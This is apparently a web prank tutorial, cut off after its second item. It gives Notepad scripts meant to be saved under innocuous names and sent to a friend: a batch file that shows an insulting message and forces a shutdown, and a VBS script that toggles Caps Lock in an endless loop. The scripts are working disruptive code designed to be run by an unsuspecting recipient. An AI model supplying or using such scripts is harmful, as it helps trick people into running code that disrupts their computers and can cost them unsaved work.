
ALL OF THEZE COMMANDZ ARE TO BE TYPED IN NOTEPAD...
===========================================1) Convey your friend a little message and shut down his / her computer: Type : @echo off msg * I don't like you shutdown -c "Error! You are too stupid!" -s Save it as "Anything.BAT" in All Files and send it. =========================================== 2) Toggle your friend's Caps Lock button simultaneously: Type : Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" loop Save it as "Anything.VBS" and send it. ===========================================
3)...